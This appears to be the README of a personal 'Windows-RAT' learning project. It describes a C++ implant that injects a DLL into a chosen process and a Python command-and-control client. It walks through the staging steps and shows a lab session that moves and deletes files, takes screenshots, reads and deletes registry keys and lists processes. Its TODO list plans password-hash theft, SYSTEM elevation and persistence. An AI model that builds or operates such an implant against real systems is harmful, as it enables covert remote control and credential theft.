This repository will serve as an exploratory environment where I will rely primarily on C++ and Windows APIs to delve into the deeper aspects of Windows security management along with the varying components and architectures that come within the Windows environment.
- Windows-RAT
- Table of Contents
- Repository Breakdown
- Assumptions
- Testing Environment
- Build Environment
- Setup & Initial Comms (In progress)
- Examples
- TODO
Packet captures between C2 and implant in a test environment for different commands. These help reinforce how interaction between our C2 and implant works for each command type.
All cpp implant side code that will, upon executing, open up a port on target and listen for commands sent by the user via Python CLI.
All py client side code that will, upon executing, open up a port on client and send commands to the implant via user input in the CLI.
All cpp implant side code that will, upon executing, survey the target prior to loading our DLL that implements our functionality and opens communications back to client to accept commands.
Current assumptions will include:
- The user has access to the target machine + network
- The user has the ability to or already has dropped .exe and .dll on target
- The user has remote shell/execution capabilities to launch payload on target
- Traditional antivirus programs have been disabled/mitigated
- Target machine is Window 10 Education version 10.0.19043 build 19043
- Python version for client is 3.7.16 (important for scapy use)
- Visual Studio 2022 version 17.11.3
The setup of this tool comprises of several steps which are important to understand if one was to properly employ it:
- User drops executable to target and runs
- Executable opens a port and waits for initial C2 connection
- C2 connects, sends filepath to write our DLL to
- C2 sends DLL file bytes
- Implant writes DLL to filepath
- Implant parses processes running on target to collect those that are inject-able; sends back to C2
- C2 allows user to choose which process to inject into; sends back to implant; closes connection
- Implant injects DLL into target process; shuts down
- DLL opens new port in target process; waits for C2 to connect
- C2 connects; starts issuing commands
- ip - IP address of target
- port - port number our implant is listening on
- N/A
pjsacchet@Patrick-Desktop:/mnt/c/Users/Admin/Projects/Personal/Windows-RAT/RAT-Py$ python3 RAT_Py_Main.py -ip 192.168.111.128 -port 1550
Reaching out to agent for connection establishment...
Connected to agent at 192.168.111.128 on port 1550
Please select from the following options:
putfile - Write a file to a location on target
getfile - Get a file from a specific location on target
dirlist - Perform a dir list for a particular directory on target
deletefile - Perform a delete file off target
screenshot - Take a screenshot of target (will get file and delete file off target)
regread - Read a registry key off target
regdelete - Delete a registry key/value off target
processlist - List all running processes off target
exit - Task agent to shutdown gracefully and cleanup
- filepath - Path (locally) to file with contents we are writing to target
- outfilepath - Remote file path where we want to write our file contents to
- overwrite - Whether or not to overwrite the file locally if it already exits (default is false)
> putfile
Required params:
-filepath - local path to file we are writing
-outputfilepath - remote path we are writing to
Optional params:
-overwrite - overwrite the file if it already exists (default: false)
> -filepath /mnt/c/Users/Admin/Projects/Personal/test.txt -outputfilepath C:\test2.txt
Sending command...
Sending file path...
Sending file contents...
Sending overwrite...
Sent data to implant; waiting on response code...
Successful file put!
- filepath - File path on target to the file we want to get
- outfilepath - Local file path where we want to write our file contents to
- overwrite - Whether or not to overwrite the file locally if it already exits (default is false)
> getfile
Required params:
-filepath - path to file on target
-outfilepath - file to write to locally
Optional params:
- overwrite - overwrite the file locally if it already exists
> -filepath C:\test.txt -outfilepath /mnt/c/Users/Admin/Projects/Personal/Windows-RAT/TestFiles/test.txt
Successful file get! Getting file contents...
Successfully wrote file contents to /mnt/c/Users/Admin/Projects/Personal/Windows-RAT/TestFiles/test.txt
- path - path to directory we would like to list off target
- N/A
> dirlist
Required params:
-path - path to directory we're listing off target
> -path C:\Users\Admin\Documents
Sending command...
Sending dir path...
Files in C:\Users\Admin\Documents:
.
..
Debugger-Command.txt
desktop.ini
Internals-DLL.dll
Internals-Exe.exe
My Music
My Pictures
My Videos
RAT-Dll.dll
RAT-Exe.exe
Successful dir list!
- filepath - path to the file we're deleting off target
- N/A
> deletefile
Required params:
-filepath - path to the file we're deleting off target
> -filepath C:\test2.txt
Sending command...
Sending file path...
Successful delete file!
- filepath - path where we would like to write our screenshot to locally
- N/A
> screenshot
Required params:
-filepath - Path where we would like to write our screenshot to locally
> -filepath /mnt/c/Screenshots/screenshot.bmp
Sending command...
Successful screenshot! Getting file size...
File is 14745654 bytes; Receiving data...
Successfully wrote file to disk... awaiting implant reponse code...
Successful screenshot!
- keypath - path to key we're reading off target
- value - name of the value we're reading from the key
- N/A
> regread
Required params:
-keypath - Path to the registry key we'd like to read
-value - Name of the value we want to read
> -keypath HKLM\SYSTEM\CurrentControlSet\Control -value CurrentUser
Sending command...
Sending key path...
Sending value name...
Successful reg read file! Getting key size...
Key data is 9 bytes; Receiving data...
Key HKLM\SYSTEM\CurrentControlSet\Control with value CurrentUser returned: USERNAME
- keypath - path to key value we're deleting off target
- value - name of the value we're deleting off target
- iskey - whether or not the value passed is a key or not
> regdelete
Required params:
-keypath - Path to the registry key/value we'd like to delete
-value - Name of the value we want to delete
Optional params:
-iskey - The value being passed is a subkey we're deleting, not a value
> -keypath HKLM\SOFTWARE\TestKey -value testvalue
Sending command...
Sending delete key... (0)
Sending key path...
Sending value/key name...
Successful reg delete!
- keypath - path to key value we're deleting off target
- value - name of the value we're deleting off target
- iskey - whether or not the value passed is a key or not
> regdelete
Required params:
-keypath - Path to the registry key/value we'd like to delete
-value - Name of the value we want to delete
Optional params:
-iskey - The value being passed is a subkey we're deleting, not a value (default:false)
> -keypath HKLM\SOFTWARE -value TestKey -iskey
Sending command...
Sending delete key... (1)
Sending key path...
Sending value/key name...
Successful reg delete!
- N/A
- N/A
> processlist
Required params:
- N/A
Sending command...
Implant found 25 processes:
svchost.exe
PID: 4000
sihost.exe
PID: 5672
svchost.exe
PID: 5028
taskhostw.exe
PID: 6052
Explorer.EXE
PID: 4252
svchost.exe
PID: 4092
StartMenuExperienceHost.exe
PID: 5200
TextInputHost.exe
PID: 2240
RuntimeBroker.exe
PID: 3672
UserOOBEBroker.exe
PID: 6200
SearchApp.exe
PID: 6336
RuntimeBroker.exe
PID: 6572
SecurityHealthSystray.exe
PID: 3132
vmtoolsd.exe
PID: 1692
svchost.exe
PID: 8164
dbgview64.exe
PID: 7700
RuntimeBroker.exe
PID: 7564
cmd.exe
PID: 7028
conhost.exe
PID: 5576
cmd.exe
PID: 6124
conhost.exe
PID: 900
DllHost.exe
PID: 1040
ApplicationFrameHost.exe
PID: 336
PhoneExperienceHost.exe
PID: 7040
RAT-Exe.exe
PID: 1348
Successful process list!
- Flesh out getfile functionality
- Eventually add flags for offsets into file and chunksizes to send back to C2?
- Should send back file size first then full size... currently only take 1024 bytes
- Flesh out putfile functionality
- Implement C2 OK messages to ensure it has the param or resend if need be
- Flesh out dirlist functionality
- Implement recursive dir lists + additional file info
- Flesh out deletefile functionality
- Return number of bytes we successfully deleted?
- Flesh out screenshot functionality
- Refactor; add output param for file buffer contents and send our data back in the caller not callee
- Flesh out registry functionality
- Handle different reg data types
- Should send back data type as separate return from implant and handle as needed in python scripting
- Handle different reg data types
- Flesh out process list functionality
- Swap out success variable for ERROR_SUCCESS
- Implement registry key write add/delete
- Add registry key value listing/add/delete
- Implement get system info
- Implement password hash stealing via registry reads
- Enable SYSTEM elevation
- Have exe inject our dll into some other process's memory
- Or simply call system API with dll - rundll or something similar
- Process query
- Return specific info about a particular process
- Driver list
- Return specific info about a particular driver
- List all loaded drivers
- Start/stop processes?
- Flags for permissions, process name etc.
- User list
- Get logged on users, all users
- Can do this via registry... or other way?
- Have exe perform survey, report results back to C2 and have C2 send DLL payload for loading
- Have exe survey running processes; inject DLL into target after running
- Survey, report back to C2 those that we can inject, then get payload and start it; maybe self kill?
- Have exe survey running processes; inject DLL into target after running
- Whoami-esq command
- Implement basic encryption?
- Give both implant and C2 same key or something for packet encryption
- Add specific error messages and translate function for easy debug messages
- Currently only support ASCII... could do unicode pretty easily?
- Persistence via registry or something?
- Add basic quit / cleanup
- Self cleanup off disk?
- Add random GUID
- Exe does not exit 'cleanly'
- Even if exe exits we do not alert our C2, so it still thinks its connected
- Put file
- Large files may fail due to socket streams mixing comamnd values